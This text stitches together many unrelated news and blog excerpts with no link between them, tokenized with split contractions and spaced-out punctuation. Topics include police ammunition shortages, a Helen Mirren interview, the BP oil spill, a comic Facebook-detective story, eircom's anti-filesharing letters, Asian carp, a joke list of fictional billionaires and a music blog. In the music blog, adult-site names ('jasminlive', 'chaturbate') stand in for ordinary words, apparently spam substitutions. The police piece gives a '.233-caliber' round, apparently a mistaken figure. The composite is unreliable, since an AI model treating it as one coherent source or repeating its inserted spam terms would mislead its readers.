Susquehanna Township Police Chief Rob Martin said he used to be able to order the year ’s worth of supplies in January .
Now he ’s ordering the 2011 supply , hoping to get his department ’s needs in sync with the projected eight - to 12 - month wait .
“ We have a very large reserve now because we properly planned , ” Martin said .
“ But this complicates our purchasing . ”
Martin , who also serves as the president of the Dauphin County Chiefs of Police Association and the commander of the county ’s Crisis Response Team , said he ’s heard from other local departments facing similar problems .
There are plenty of theories as to why ammunition is in short supply — the wars in Iraq and Afghanistan , metal shortage , even hoarding by people who fear a government crackdown on gun ownership — but no one could point to one cause .
Tim Toth , an assistant manager at Bass Pro Shops in the Harrisburg Mall , was hard - pressed to blame a single circumstance for the order delays but said it ’s been a problem for more than a year .
Hunting rounds appear less affected by the delays than are the .40 - caliber , .45 - caliber and 9 mm rounds frequently used by law enforcement , he said .
Still , Toth advised hunters to plan .
“ Personally , if I saw a box or two of what I needed [ for hunting season ] , I ’d pick up a box or two now , ” he said .
Carroll Wagner , an education specialist with the Shumaker Public Safety Center at Harrisburg Area Community College , said he is waiting for orders of .45 - caliber semi-automatic rounds he placed in January .
The estimated arrival date is February .
“ The war has a lot to do with it , but there ’s also a metal shortage , ” Wagner said .
“ I have to keep enough on stock so I can have it .
If I did n’t , I would n’t be able to have classes for officer training .
We ’re always able to get it , but if I order retail , it ’s close to double the price . ”
HACC , which offers municipal police officer cadet training and education for those serving , estimates usage at about 2,000 rounds per cadet for the 80 - hour training course .
The college supplies ammunition and loaner 9 mm pistols to cadets .
The equipment is part of the $ 3,000 fee to take the course .
Departments that want to use the center 's range for veteran officer qualification have to bring their own supplies .
Wagner said officers are required to recertify annually with their service weapons , but most departments require more than that .
Officers using specialized weapons , such as tactical rifles used in crisis operations , might train once a month , he said .
At the Pennsylvania State Police Academy in Derry Township , training on guns requiring .233 - caliber practice rounds has to be monitored because those bullets are among the most scarce , said Cpl. Rodney Manning , the director of the training division for the Bureau of Training and Education .
East Pennsboro Township Police Chief Dennis McMaster said he can’t remember a time when ammunition has been so difficult to come by .
The department requires its officers to qualify three times a year on its weapons — .40 - caliber handguns , 12 - gauge shotguns and M - 4 patrol rifles .
Getting handgun and M - 4 rounds has been difficult because they are also popular in the military , McMaster said .
“ We ’re fighting a war on two fronts , ” McMaster said .
“ The Army has to practice just like the policemen . ”
I recorded a lively sit - down discussion today with Charles Komanoff , the subject of my Wired article ; Reihan Salam ; Skymeter CEO Kamal Hassan ; and Corey Bearak of Keep NYC Free .
We were safely ensconced in Reuters ’s fourth - floor studio overlooking the traffic of Times Square , and the full talk should be available on Friday .
But here ’s a couple of teasers , courtesy of Hassan : firstly , might it be possible to implement a de facto congestion - pricing scheme using only parking fees , with no fees for driving ?
Is that the way Chicago is headed ?
And secondly , did you know that after London implemented its Congestion Charge , subway ridership went down , rather than up ?
Here ’s a video promo for the debate :
To promote the forthcoming launch of the Droid X handset , Verizon this week took out a full - page ad in The New York Times in which it mocked widely reported reception issues with the iPhone 4 .
As first noted by Macworld , the ad touts a number of features found with the Droid X , including an 8 megapixel camera with dual - LED flash , 3G Mobile HotSpot for sharing Internet connectivity with up to five Wi -Fi devices , and an HDMI output .
The advertisement also makes note of reception with the device .
" Most importantly , it comes with a double antenna design , " the advertisement reads .
" The kind that allows you to hold the phone any way you like and use it just about anywhere to make crystal clear calls .
You have a voice .
And you deserve to be heard . "
Of course , the advertisement is referring to recent widespread reports that the iPhone 4 can lose signal when held in the left hand .
Users can cause their handset to experience a reduction in reception when using their palm to cover a seam that separates the device 's two perimeter radio antennas .
Apple said last week that the software in the iPhone 4 calculates bars of signal strength incorrectly , and the problem will be addressed in the coming weeks through a free update .
As for the hardware , the company has said that all handsets experience some signal loss when held in the hand .
Verizon had to correct a previous advertisement that incorrectly claimed the Droid X sports a 720 p high definition screen .
The actual resolution of the Droid X is 854 by 480 pixels , which is the same resolution as the original Motorola Droid released last November .
For comparison , Apple 's newly released iPhone 4 has a 960 - by - 640 pixel resolution display .
Driver has heart attack and crashing into the Turk Telekom building in Kastamonu , Turkey .
Driver transported to hospital but he is dead .
Escaping guy is OK .
Photographs by Juergen Teller .
Hair and Makeup by Neil Young / Carol Hayes Management .
“ All that getting sanctioned by authority , settling down and doing the right things — well , I ca n’t say it appeals much , ” Helen Mirren once said to a reporter .
“ What I really fancy is getting a bit notorious … ”
It was 1974 , and she was a 29 - year - old actress teasing the journalist much as she would the press and audiences for the next 36 years .
Mirren was then a rising star at the Royal Shakespeare Company — luridly dubbed “ Stratford ’s very own sex queen ” by one paper .
It was long before the authorities sanctioned her with a pile of awards ( including an Oscar for The Queen ) , and before the Internet made her a viral phenom thanks to bodacious paparazzi shots of her cavorting in a bikini .
At the age of 62 .
And guess what ?
She had it both ways :
She got her notoriety and the fusty accolades .
“ I am a little notorious , ” Mirren remarks , still teasing .
She says nearly everything with a mischievous twinkle , like a naughty teenager appending “ … in bed ” to the end of every sentence .
The actress , who turns 65 next month , is elegantly attired in pale rose and silver , her delicate hands ( the nails tinted a matching pearlescent rose ) constantly buttoning and unbuttoning her cardigan .
It ’s probably not meant flirtatiously , but with Mirren , every action can feel like a seduction .
Perhaps it ’s the small , black Native American tattoo on her left hand ( the result , she says , of a wild , drunken night in Minnesota ) , her subtle finger to propriety .
“ It ’s weird when your life becomes vintage , like a period movie , ” she says half - seriously .
“ I ’m getting less notorious as I get older .
People forget that I ever was . ”
Her latest role , not to mention the Juergen Teller photos attending this article , should help remind everyone .
After a raft of prestigious parts and three Oscar nominations in the last decade , Mirren signed up to play Grace Botempo , the madam of a booming seventies Reno whorehouse in her husband Taylor Hackford ’s film Love Ranch , opening June 30 .
( The film , based on Nevada ’s real Mustang Ranch , is scripted and produced by New York contributing editor Mark Jacobson . )
For years , Hackford , whom she married in 1997 , has asked her to play smaller parts in his films .
“ And I said ‘ Oh , for God ’s sake !
Of course I ’m not going to do that !’ ” says Mirren .
“ They were never interesting enough parts , and I was n’t going to do it just because he was directing it . ”
Interesting is probably underselling Grace .
Diagnosed with cancer and frustrated with an epically sleazy husband ( Joe Pesci ) , Mirren ’s madam begins a hot love affair with a beefy boxer 30 years her junior , played with abundant smolder by Spanish newcomer Sergio Peris - Mencheta .
“ He ’s got a fabulous big- animal thing in that sort of raw , brutish , ugly - beautiful way , ” says Mirren , who shares a steamy , and , because it ’s her , entirely plausible love scene with Peris - Mencheta .
In addition , she makes dick jokes , stomps on the throat of a misbehaving prostitute , and presides over the brothel with such swagger that Pesci shouts , “ Who do ya think you are , the queen of fuckin ’ England ? ”
Well , yes .
In another of her earliest interviews , Mirren was quoted as saying , “ I ’m a would - be rebel — the good girl who ’d like to be a bad one . ”
She says she continues , at heart , to be the good Catholic schoolgirl named Ilyena Vasilievna Mironov , who grew up in Essex , England , with a Russian father and an English mother .
“ It ’s true !
I have n’t grown out of that , have I ? ” she says , laughing .
“ I ’m still the good girl who wants to be a bad girl .
But I ’ll never make it as a bad girl …
I ’m not a prude or a moralist and I never have been , but I ’m too fearful , too much of a wimp , really . ”
When her husband tried to convince her to spend a night at the Mustang Ranch , Mirren refused .
“ I said , ‘ Read my lips : I ’m not going to spend a night in a brothel . ’ ” In the end , she dispensed with research and simply took direction .
“ It ’s amazing how quickly you get into dildos everywhere and pink - feather handcuffs .
Within an hour you ’re completely used to it . ”
Mirren believes that brothels should be legalized because its safer for the sex workers .
But she ’s also loathe to romanticize working girls : “ Susan Austin [ the Mustang Ranch ’s real madam ] said you had to be tough , because maybe you do have 25 psychotic whores .
A lot of them come from very dysfunctional backgrounds , and women together like that can be very dangerous . ”
There ’s the old joke about actors prostituting themselves for their work , but for Mirren , who ’s revealed so much of herself ( metaphorically and otherwise ) , and who has often spoken out about the way women get eaten up by the entertainment industry , it ’s a complex metaphor .
“ The girls who work in the sex industry , they put themselves out of their bodies .
An actor does sort of the opposite , ” says Mirren , who talks about acting as giving every intimacy — emotional and physical — except actual intercourse .
“ People say ‘ Oh , you play someone else . ’
I ’m always playing myself .
You can only do it by going into yourself , in the deepest , most terrifying way .
Not to say I have n’t ever prostituted myself quite often and happily .
But in my heart it ’s very serious . ”
Mirren , who began as a devoted stage actress , schooled in Chekhov and Shakespeare , quickly learned to use her sexuality to her advantage .
“ Especially when you ’re younger and you ’re a female , you ’re being judged physically as much as for everything else , ” she says .
“ And when you ’re a serious actress like I was … I ’ve always taken it very seriously at that level . ”
Of her scandalous early roles in 1969 ’s Age of Consent ( when she stripped as the teenage muse of an older painter ) or Gore Vidal and Bob Guccione ’s nutty art - porn Caligula ( 1979 ) , Mirren says she had a plan .
“ A lot of it is plain , old - fashioned practicality .
I wanted to work , ” she says .
“ When I did Caligula , for example , I had n’t really done movies . ”
And besides , she adds , “ I much prefer overt sexuality to sleazy , vulgar prurience . ”
As Mirren explains it , she struggled to get a handle on her own sexuality in order to use its power to accomplish her ambitions .
“ The Playboy Mansion , coke , and the rise of all that — Guccione and Hefner always pushed it as liberation , but it did n’t seem like that to me , ” she says .
“ That was women obeying the sexualized form created by men — though maybe we always do that , because we want to be attractive .
But I was kind of a trailblazer because I demanded to do it my own way .
I ’d say , ‘ I ’m not having it put on me by someone else . ’
I did n’t want to be the sort of puritanical good girl with a little white collar who says , ‘ Do n’t shag until you get married . ’ ”
Now , her reputation secure , Mirren ’s enjoying the results of her efforts .
“ I ’m thrilled young girls are claiming their sexuality for themselves , ” she says .
“ I love bold women : Madonna and Scarlett Johansson — sexy and gorgeous , but not only that .
And Miley Cyrus — fantastic !
And Lady Gaga .
I love the way she ’s elevated pop to performance art , or dragged performance art down to pop , or maybe made a wonderful amalgam of the two . ”
With her coy smile , Mirren looks like the conspiring queen who ’s usurped the throne , securing the kingdom for her heirs : “ My girls : Miley , Scarlett , Lady Gaga .
My team … Yes . ”
All photographs by Juergen Teller
HOUSTON / LONDON ( Reuters ) - A growing storm delayed efforts to capture more oil gushing into the Gulf of Mexico as BP Plc and Russia ’s government traded words on Monday over the future of the energy giant ’s chief executive .
The Federal Reserve Bank of New York , probing the exposure of big financial firms to the British energy giant , gave banks a “ passing grade , ” one source told Reuters .
High waves from tropical storm
Alex will delay BP ’s plan to add more oil - siphoning capacity to its leaking well until next week , a company executive told reporters in Houston , while state officials said Alex would hinder clean - up efforts .
Alex is the first in a new season of storms , raising concern about prolonged efforts to get control of the undersea leak that has spewed oil since April 20 , threatening fisheries , tourism and wildlife in four states along the U.S. Gulf Coast .
Kent Wells , BP executive vice president of exploration and production , said the current siphoning systems should not be affected “ unless unfortunately a storm heads directly our way . ”
But waves as high as 12 feet would delay hooking up a third system to capture oil , he said .
In London , BP said Tony Hayward was still its CEO , with no change under discussion , after Russian Deputy Prime Minister Igor Sechin said he expected the embattled boss to resign soon and Moscow to be told the name of his successor on Monday .
Adding credence to BP ’s statement , Sechin ’s office said later that management changes were not raised when he met Hayward , who has been criticized over his response to the disaster and was in Russia to address Moscow ’s worries about BP ’s local operations in the leak ’s wake .
ALEX STORMS INTO GULF
Forecasters at the National Hurricane Center said Alex was expected to become a hurricane on Tuesday , with winds of 96 - 110 mph by late on Wednesday before striking near the Texas - Mexico border and moving inland .
Shell shut subsea production at two platforms and BP evacuated some personnel from three platforms due to the threat of Alex , the companies said on Sunday .
Florida officials said swells churned up by Alex would hinder clean - up operations .
“ Over the next several days the winds and current are going to hamper some offshore operations and the current is going to be pushing things more onto shore , ” said state meteorologist Amy Godsey .
While a hurricane could also interrupt BP ’s efforts to cap the well , some specialists say the heavy weather could actually help mitigate environmental damage by dispersing the oil .
U.S. - listed shares of BP rose about 3 percent in morning trade on Monday , the first session after a sell - off that sent the stock to a 14 - year low , but faded in the afternoon to close just 0.3 percent higher .
The shares , a staple of pension funds , have lost more than half of their value since the spill began two months ago and are down some 24 percent since the start of June .
The New York Fed has been probing exposure to BP to ensure Wall Street and the global financial system would not be at risk if the oil giant buckles under the costs of the spill , according to two sources familiar with the matter .
After poring over documents and asking banks about their exposure to BP over the past two weeks , the New York Fed found no systemic risk and had not asked firms to alter their credit relationships with BP , the sources told Reuters .
Slideshow ( 28 images )
“ The Fed gave banks ’ exposure to BP a passing grade , ” said one of the sources on condition of anonymity .
Beyond ’s BP survival prospects , the examination underscores market uncertainty about how the spill ’s staggering clean - up bill might affect Wall Street , a fragile economic recovery and the multitrillion - dollar energy market .
BP said on Monday its spending to cap the well , clean up the spill and compensate those affected had accelerated to $ 100 million a day , bringing the total so far to $ 2.65 billion .
The company has set up a $ 20 billion compensation fund under U.S. government pressure .
Slideshow ( 28 images )
Kenneth Feinberg , the independent administrator of the fund , has said it made “ absolutely no sense ” to drive BP into bankruptcy , while promising to streamline the claims process and even let some victims file online .
BP ’s earlier handling of compensation on its own came under fire as unduly bureaucratic and time - consuming .
Feinberg expressed doubt on Monday that compensation could stretch as far as a New Orleans strip club that says it has lost business because the fishermen who are its customers are out of work due to the spill .
“ I do n’t think they ’ll get money out of this fund , ” he said in an interview with Fox News , adding the $ 20 billion “ should be reserved for the most directly impacted claims . ”
LOUISIANA WORRIES
While Alex remained at a safe distance , people in southeastern Louisiana had more immediate concerns as lightning lit up the sky and a torrent of rain flooded roads .
Some residents were also concerned about BP and the Coast Guard ’s continued use of chemical dispersants .
On Monday , crews sprayed the material far offshore using airplanes .
Dispersants help oil dissolve within months , breaking it down into small particles that can be easily digested by organisms living in the Gulf .
But they are controversial as the long - term health implications are not clear .
The Environmental Protective Agency is studying the use of dispersants .
“ They should stop using them , ” said Mary Tompkins of Nairn , Louisiana .
Nalco , the company that makes the primary dispersant being used , Corexit , says the product is safe in the environment .
“ I do n’t believe that , ” Tompkins said .
“ They need to stop . ”
U.S. Senator George LeMieux , a Republican , toured Pensacola Beach on the Florida Panhandle before returning to Washington to file a bill aimed at loosening restrictions he said prevented more oil skimmers from helping clean up the Gulf .
“ There are 2,000 skimmers in the United States , ” LeMieux said .
“ Why they are not all here , makes no sense to me . ”
Celebrate by playing , converting or casting a video .
Or , unlock advanced features with DivX Pro .
Get the best possible entertainment experience with the features of DivX Pro :
Enjoy Your DivX Software
→ Find out if you have a device ( TV , blu - ray player , in - car player , etc. ) that is certified to play DivX video .
→ Check out our Support section to find answers and ask questions about Converter , Player or Media Server .
→ Read up on the components of DivX Software or the technologies that help create amazing digital experiences .
I knew she was coming into my office before she even knocked .
Maybe a part of my brain heard the soft footsteps , or maybe it was the smell , or the way some guys can always tell when a woman 's nearby .
Or maybe I 've just got a sixth sense for bad news , thanks to all my experience .
Regardless , even though I was prepared for an entrance , I certainly was n't prepared for her entrance .
She wore a short blue dress that was tight in all the right places , and she wore it well .
The dress was n't too shy to let out a pretty nice view of a long set of legs , but still concealed just enough to let a man 's imagination go for a spin .
She had blond hair , the kind that 's so bright it gives off a little bit of excess light to the surrounding areas .
Seeing that shine around her head , you might mistake it for a halo .
If you did n't catch her eyes , that is .
The eyes tell you there 's more to this broad than your first glance will cobble together .
That 's her giveaway .
You can pretty your hair up and put on some fine lipstick and sneak into your best Sunday dress , but if your eyes say " Trouble , " there 's not a powder , dye or skirt in the world that 'll cover it up .
She batted her eyes on instinct , and I was reminded of every stupid decision I 'd ever made .
" Excuse me , " she said , her voice somewhere between a sigh and a whisper .
" Are you really a detective ?
A Facebook detective ? "
" That 's what it says on my door , " I said , lighting a cigarette .
Continue Reading Below Advertisement
" My name is Regan Woodsturn .
I need help , " she said .
Admitting , it 's the first step .
" Admitting , it 's the first step , " I said , because it seemed foolish to waste a line like that on inner monologue .
" It 's a case I need you to handle .
Actually , I 've got three cases I 'd like you to take a look at , if you do n't mind . "
Between her legs that seemed to travel for days and a set of eyes I 'd break a rule or two for , so far there 's nothing this broad 's shown me that I 'd found disagreeable , so I decided to hear her out .
She unloaded a story about three people that were making the forecast a little bit cloudy over on Planet Woodsturn .
Three unrelated issues , all happening to her , simultaneously , all bad enough that she needed a private dick to ride in , ask some questions , get some answers .
I 'd say she must have had it pretty rough , if I was n't positive that those eyes could bat their way out of any corner she backed herself into .
She wanted me to hit the streets of Facebook and gather some information on these associates of hers that were making her antsy .
Facebook , like me , works alone and plays pretty loose with the rules when it comes to privacy .
A few people might have a problem with that , and maybe they 're right .
Or maybe they 're hiding something .
Anyway , it 's my beat .
Facebook .
But something about these cases stunk .
" Please help me , detective .
I would be ever so grateful . "
" Oh I 'm sure it would just warm your heart , but , if you do n't mind , I 'll pass .
There are plenty of dicks in this town .
But I 'm sure I do n't need to tell you that .
"
That one actually probably should 've been just an inner monologue thing .
" I 'm afraid I do n't understand , " she said .
" Listen lady , " I said as I stood up from my desk .
" I like the way you smell , it 's sort of like cinnamon mixed with a memory .
And I like your hair , and I 've found that the only thing hard about your eyes is taking mine off them .
I 've very much enjoyed your long , sweet Popsicle sticks and sincerely appreciate their visit .
They 're welcome here any time . "
I crossed the room so I was standing right in front of her .
Too close for two strangers , but a muscle other than my brain was calling the shots and I was n't in a position to argue .
" But if you think for a second that a pretty face and a couple of easy teasing ' atta boy 's ' is enough to get me to take a case that 's more slippery than yesterday 's fish and twice as rotten , then you 've got another thing coming , sweetness . "
I reached behind her and grabbed the door , pulling it open .
" So thanks , Mrs. Woodsturn , but no thanks , all the same . "
As I held the door open , taking in a few last - minute inhales of her perfume and idly wondering if " Popsicle sticks " was actually an established slang term for " legs , " she pulled out a checkbook that she kept in a small clutch on her left wrist .
" Ten thousand dollars , plus expenses , " she said .
" Is it starting to smell a little better now , detective ? "
A stronger - willed man would 've tossed her out , told her that there is n't enough money in the free world worth taking three cases that smelled like a setup from a mile out .
But I bet a stronger - willed man would n't need ten grand quite as much as I did .
Without a word , I let her slip the check into my breast pocket .
It felt hot .
" Atta boy , " she said .
Get the biggest stories sent straight to your inbox Sign up for regular updates and breaking news from WalesOnline Thank you for subscribing
We have more newsletters
Show me See our privacy notice Invalid Email
THE Welshman starring as Spartacus , in a gory new version of the rebel gladiator ’s life story , is making a good recovery from cancer .
Father - of - two Andy Whitfield , 36 , who grew up in Amlwch , Anglesey , was diagnosed with Non Hodgkin ’s Lymphoma after completing the first series of Spartacus : Blood and Sand .
It tells the age - old tale of Spartacus , who escaped from a gladiator school to lead a slave revolt that shook ancient Rome to its core .
Landing the part made famous by Catherine Zeta - Jones ’ father - in - law Kirk Douglas , in the iconic 1960 movie Spartacus , was Whitfield ’s big break .
But after the initial series won over the American viewing public despite its high sex and violence content , cable channel Starz had to postpone a follow - up season while Whitfield checked into a specialist hospital in New Zealand where the show was filmed .
Traditional treatment for the condition are gruelling , involving a mixture of chemo and radiotherapy and occasional stem cell transplantation .
But now South African model turned actress Lesley Ann -Brandt , who plays the slave Naevia in the series , has said Whitfield , a former Ysgol Syr Thomas Jones pupil , is on the road to recovery .
And she said a second series starring Whitfield as Spartacus would be filmed later this year .
Speaking in the US , she said : “ Andy ’s looking good .
We ’ve just had an e-mail message from him and he ’s doing really great .
“ He ’s just about finished his treatment .
“ Over the past few months I ’ve managed to do lunch with Andy and his wife and he does n’t look sick at all .
“ He ’s got 100 % backing from his wife and family and after the prequel in which Andy will be appearing in one or two episodes we will be ready to go for a second series later in the year . ”
The Starz channel , which has given its full backing to the Welshman , has commissioned a short prequel series so Whitfield can come back from illness without losing the title role .
Shooting of the prequel , in which Whitfield will make occasional appearances , begins in New Zealand in July .
' A blur of boobs and bullet - time camera work ' : next page
In Spartacus : Blood and Sand , Four Weddings and a Funeral star John Hannah plays gladiator school master Batiatus with Lucy Lawless of Xena : Warrior Princess fame , playing his wife .
The UK premiere of the graphic drama on Bravo on Tuesday last week gave the channel its biggest ever audience .
The heavily promoted show , described by the Radio Times as “ a blur of boobs and bullet - time camera work ” and “ a swords - and - sandals epic for the Nintendo DS generation ” , attracted 365,000 viewers , a 2.2 % audience share .
Bravo ’s previous highest audience was for an episode of Blade , broadcast in January 2007 .
Spartacus delivered a huge ratings boost to Bravo , with an audience share nearly 10 times the network ’s average for the slot over the past three months .
But it has not met with universal approval .
MediaWatch director Vivienne Pattison believes sex and violence on TV can be harmful .
“ We can no longer ignore the fact that what viewers see on television has an impact on society .
“ There are numerous studies linking exposure to violence on TV to violent behaviour at large .
“ And if there is the slightest possibility that explicit sex and violence on screen can cause this harm is it worth the risk in the interest of entertainment ? ”
After leaving North Wales where he was a regular at the Plaza Cinema in Bangor , Whitfield studied engineering at Sheffield University and worked in London for five years before moving to Sydney in 1999 .
He used to work as an engineering “ abseiler ” checking out buildings such as the Sydney Opera House for problems .
But he took an acting course and became a well - known face , having appeared in around 40 Australian commercials also shown in Europe and Asia .
After “ enjoying being on film sets ” he was plucked from relative obscurity to play the lead in the movie Gabriel , shot around Sydney in 2006 .
The film was a dark action picture set in purgatory , between heaven and hell .
Adrian Weckler has published a copy of the intended notification to be issued by eircom to its customers when accused of unlawful filesharing by the Irish recording industry ( represented by IRMA ) .
It is , as warning letters go , extremely polite .
I mentioned last month that this “ three strikes ” system agreed between IRMA and eircom was approved by the High Court ( for data protection purposes ) on the basis that IRMA would not know “ that the infringer is a particular person living in a particular place in Ireland ” .
In fact , Charleton J. said that all IRMA will “ know is that a particular IP address has been involved in the downloading . ”
However , it appears that DtecNet , who will collect IP addresses for IRMA , has the capability to collect more information than just IP addresses .
Whether such capabilites are to be used as part of the IRMA / eircom system is not known .
My suspicions were raised by eircom ’s statement on their website that IRMA will send notifications to eircom “ containing among other things the IP addresses of individuals ” .
Such suspicions could be unfounded ; for example , IRMA might be sending eircom a list of shared files along with the IP addresses and that information might not be personal data .
However , the template letter reproduced by Adrian says :
Some of the details of the notification supplied by IRMA are set out below …
Is it not strange that eircom repeatedly notes that IRMA will be supplying them with more details than are apparently necessary for the purposes of the three strikes system .
What are those details ?
Kristol 's ideology reminds me a lot of Marxism .
It 's a theory that works only in an ideal world that does n't actually exist .
In Kristol 's world , the US can muster the political will and economic might to build an enormous army akin to what we fielded in World War Two .
He believes we can march that army into the heart of the middle east and impose our will on a country like Iran ; that doing so would have no long term negative ramifications for our economy ; and that any negative consequences to our standing in the world could be ignored because we are the all powerful hegemon .
Of course none of that is true .
Whether Iran counter - attacked or not , the consequences for our country would be almost entirely negative if we attacked them .
There 's no realistic scheme under which we could unleash the kind of overwhelming force Kristol suggests .
So our limited efforts would only secure the power of those currently in charge in Tehran and they would crush any straggling remnants of the green revolution .
It would give an excuse to other nations to ease up on sanctions in the interests of making money from trade with Iran .
It would provide the justification for Iran to go really nuclear in the future and the means by which to do it .
CHICAGO , June 23 ( Reuters ) - A 20 - pound ( 9 - kg ) Asian carp was fished out of a waterway close to the Great Lakes and beyond twin electric barriers designed to keep them out , authorities said on Wednesday .
It was the first time the voracious invader has been found beyond the electric barriers in the waterways that connect Lake Michigan , one of the five Great Lakes , with the Mississippi River basin , where the carp have proliferated .
“ It ’s important evidence , and the more information we know about where the carp are , the better ... that ’s the reason we ’re intensifying the effort ” to find any Asian carp beyond the barriers , said Chris McCloud , a spokesman for the Illinois Department of Natural Resources .
The live Bighead carp was fished out on Tuesday by a fisherman contracted by the government in Lake Calumet , 6 miles ( 10 km ) from Lake Michigan .
It could have been dumped there or could have found its way past the electric barriers meant to block all fish species , McCloud said .
Michigan and several other U.S. states bordering the Great Lakes have filed suit demanding a separation of the two basins , fearing Asian carp will ruin the Great Lakes ’ $ 7 billion fishery .
Several environmental groups support the separation of the basins , which were connected by man-made waterways a century ago .
Commercial interests including tour boat operators , barge companies , and the recreational boating industry oppose the closing of the connecting waterways .
Federal and local authorities have embarked on a long - term project to build more barriers , search for invasive carp , and use fish poisons and other measures to kill the carp before they become established .
There ’s Always Money in the Banana Stand , Michael
Lucille Bluth , of the Bluth Company , rounds out Forbes magazine ’s 15 richest individuals for 2009 fiscal year .
Lucille # 1 finally drank her way into the rankings by knocking off Jabba the Hutt and Mr. Monopoly .
Rumors say husband , George Sr. , is still pulling the strings from an undisclosed location , but Lucille # 1 is the lady cashing the checks .
The honor of this year ’s top earner belongs to that blond vampire daddy , Carlisle Cullen with an estimated take of $ 34.5 billion ( although , I still think he looks like Mike Dexter from Ca n’t Hardly Wait ) .
Perennial favorites , who again appear on this year ’s line up include playboys Tony Stark and Bruce Wayne , as well as “ Texas tea ” magnate , Jed Calmpett .
My greatest disappointment is that freakin’ Chuck Bass showed up on the list for the first time .
Ben , my intern , however , actually squealed in celebration , like a 11 year old girl at a Justin Bieber concert .
Then he whispered , “ XO - XO gossip girl ” and tied a napkin around his neck .
It ’s Friday , so I did n’t ask ( plus Mr. Howell ranked higher … so there ’s that ) .
Here ’s the complete list :
1. Carlisle Cullen – $ 34.5 billion
2. Scrooge McDuck – $ 33.5 billion
3. Richie Rich – $ 11.5 billion
4. Tony Stark – $ 8.8 billion
5. Jeb Clampett – $ 7.2 billion
6. Adrian Veidt – $ 7 billion
7. Bruce Wayne – $ 6.5 billion
8. The Tooth Fairy – $ 3.5 billion
9. Thurston Howell III – $ 2.1 billion
10 . Sir Topham Hatt – $ 2 billion
11 . Artemis Fowl – $ 1.9 billion
12 . C. Montgomery Burns – $ 1.3 billion
13 . Chuck Bass – $ 1.1 billion
14 . Jay Gatsby – $ 1 billion
15 . Lucille Bluth – $ 950 million
The 2009 15 , their bios and earnings can be read at Forbes.com here .
This entry was posted on Friday , June 4th , 2010 at 3:42 pm .
File under general .
Responses are currently closed , but you can trackback from your own site .
Mr. Bean In South Africa – The Great Beanaldo
Mr. Bean is a British comedy television series of 14 half - hour episodes starring Rowan Atkinson as the title character .
Different episodes were written by Rowan Atkinson , Robin Driscoll , Richard Curtis and one by Ben Elton .
The first episode was broadcast on ITV on 1 January 1990 , with the final episode , “ Hair by Mr. Bean of London ” , on 15 November 1995 .
Based on a character developed by Rowan Atkinson at university , the series followed the exploits of Mr. Bean , described by Atkinson as “ a child in a grown man ’s body ” , in solving various problems presented by everyday tasks and often causing disruption in the process .
During its five year run the series gained large UK audience figures , including 18.74 million for the 1992 episode “ The Trouble With Mr. Bean ” .
The series has been the recipient of a number of international awards , including the Rose d’Or .
The show has been sold in 200 territories worldwide , and has inspired two feature films and an animated cartoon spin - off .
MADMIKESAMERICA HOMEPAGE
Excellent new CD
While most took a the day off from posting ( like ourselves , almost ) , a few sites kept it going on President 's day .
So if you 're coming back to work on Tuesday from the long weekend , here 's a part of what you may have missed :
Based on what I 'm reading , it looks like I should have gone to see Bloc Party at the party at the Roxy on Sunday .
Brooklyn Vegan was there and came away quite impressed , as did Central Village .
Hope you have your tickets for Bloc Party 's Bowery Ballroom shows in April .
You might also want to say some prayers that these shows are n't move to Webster Hall .
If you do n't have Bloc Party tickets , get the next best thing by downloading (. shn ) a live performance the band did for French radio station Studio 105 on February 7 .
Registration is required .
Sadly , Hunter S. Thompson committed suicide on Sunday .
I 'm not familiar enough with Thompson 's work to offer any personal comments , but Rolling Stone magazine , a publication which Hunter frequently contributed to , has a in - depth obituary .
ChartAttack lists the " top 10 reasons why Hunter S. Thompson was cool " , the Guardian picks some of Thompson 's choicest quotes , and the Washington Post writes an appreciation .
And finally , the White Stripes are about to start recording a new album .
Menomena Coming Back to NYC
It 's all about upcoming shows this week around here .
First I got excited about a second chance to see Phoenix live .
Then we learned that Prefuse 73 had forgiven us for stealing from him and will play a couple shows in our area .
Now it 's time for the muppet - loving Menomena to get us all excited about some live rock and roll !
Yes , Menomena are coming back to New York , March 11 at Northsix , and March 12 at the Mercury Lounge .
Pit er
Pat are actually headlining both shows .
I really do n't know much about Pit er Pat , but they 're on Thrill Jockey Records and have a web site .
Also on the bill for the Mercury Lounge show are Clap Your Hands Say Yeah and Metallic Falcons .
Tickets are not on sale yet .
When Scott Herren learned that his upcoming Prefuse 73 album , Surrounded By Silence had been leaked to the Internets , he flipped .
Posting on his web site last week , he sarcastically thanked the downloaders and leakers for essentially stealing money from his pocket .
Read our post about it here .
Well , Scott 's had some time to think and now he 's cooled off a bit .
He 's posted a new message on his site .
Check it out :
" Ok people , it 's time to for me stop bitching , explaining , running my mouth and show all of you love .
i've been on the defense because i know this jasminlive album runs a bit varied , hard to swallow and without knowing what the hell i'm getting at , it 's the first record i've done where i had to listen to it and go ; " what the fuck ? " - you know ?
This music is for me , for you , for the next person .
i'm trying to connect with you as personally as time allows and let you fans and supporters who have been down and got them edit records back in the day and do n't hate for the sake of hating to say ; I LOVE ALL OF YOU !... " [ more ]
Those news bums me out
As I mentioned in the headline of this post , Prefuse 73 has booked his return to NYC for May 6 at Northsix and May 7 at the Bowery Ballroom .
These dates are just a part of his Spring 2005 U.S. tour .
Despite Scott 's kiss - off , I 'll be sure to buy my tickets as there will likely be many interesting special guests at each gig .
Matador 's policy is not to comment on these things , but Time Out New York is reporting that they have dropped the Prosaics from their roster .
I think the " Interpol Lite " reviews of the Aghast Agape EP were more a product of circumstances ( sharply - dressed NYC post - punk band on Matador ) than the actual music ( which I really liked ) , and I hope the middling critical reaction was n't a big factor in Matador 's decision .
Either way , I 'm still looking forward to a Prosaics full - length .
I wish it was on Matador ( since I 'm sort of a Matadork ) but I 'll survive .
Ever wonder who the random people are on all those Smiths and Morrissey covers ?
Wonder no more - this site explains it all .
The cover of Meat is Murder , for example , is from Emile de Antonio 's 1969 film In the Year of the Pig. [ Via TMN ]
Noel Gallagher 's reaction to Oasis selling out MSG in an hour is nothing short of classic .
X - Wife 's lead singer Joao Vieira answers 20 questions on Cokemachineglow this week , and throws me a nice shout - out .
I 'm definitely blushing .
Earlier this week , Pitchfork reported that M.I.A.'s Arular is no longer being released on Tuesday as planned .
Instead , it 's been postponed indefinitely due to a legal issue over a sample on the record .
I do n't know if " Bucky Done Gun " is the song in question , but S / FJ has an interesting note from Diplo about the samples on that chaturbate song ( and baile funk in general ) .
Semi-related , Fluxblog has a great baile funk - inspired tune by the Brazilian group Funk Cruel available today .
Continuing this week 's leak theme , Spoon 's new record Gimme Fiction is now also making the rounds .
I 've been cooling off on leaks lately , and all the talk this week is only pushing me further down that path .
